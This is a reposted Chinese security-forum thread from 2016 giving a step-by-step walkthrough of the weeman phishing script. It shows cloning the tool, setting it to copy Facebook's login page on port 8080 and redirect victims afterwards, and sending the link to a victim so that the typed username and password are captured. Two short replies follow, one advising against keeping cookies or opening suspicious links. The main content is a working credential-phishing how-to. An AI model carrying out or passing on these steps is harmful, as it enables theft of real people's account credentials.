【攻防】网页钓鱼之weeman使用

true · 发表于 2016-5-27 19:24:23

【转载】

weeman是一个由Python编写的脚本。它可以创建一个钓鱼页面，来窃取用户的信息。下面我们来看看，如何使用该脚本。
首先，让我们从github上进行下载。
github clone https://github.com/Hypsurus/weeman

下载成功后，我们进入该目录。
cd /root/Desktop/weeman
并在该目录执行 weeman 。
./weeman.py

下面让我们利用该工具的 show 命令，来查看我们需要做哪些配置。我们以Facebook为例。
show
设置我们需要克隆的网址页面。
set url http://www.facebook.com
设置监听访问端口。
set port 8080
设置当目标的用户名及密码，被成功钓鱼后需要跳转到的页面。我们任让他跳到Facebook的主页。
set action_url http://www.facebook.com
执行。
run

成功执行后，它会返回一个克隆的页面和链接。只要将链接发送给受害者，当他点击链接并输入账户信息就会被记录，反弹给攻击者。

下面我模拟受害者点击并输入账户，很快在weeman 的界面获取到了我输入的账户信息。

zmr123456 · 发表于 2016-6-1 15:27:46

到处是窃取信息的脚本文件，以后我上网都不敢动了

true · 发表于 2016-6-1 21:39:49

zmr123456 发表于 2016-6-1 15:27
到处是窃取信息的脚本文件，以后我上网都不敢动了

不保留 cookie 不随便打开可疑链接很大程度上可避免！！

		自动登录	找回密码
密码			立即注册

[技术交流] 【攻防】网页钓鱼之weeman使用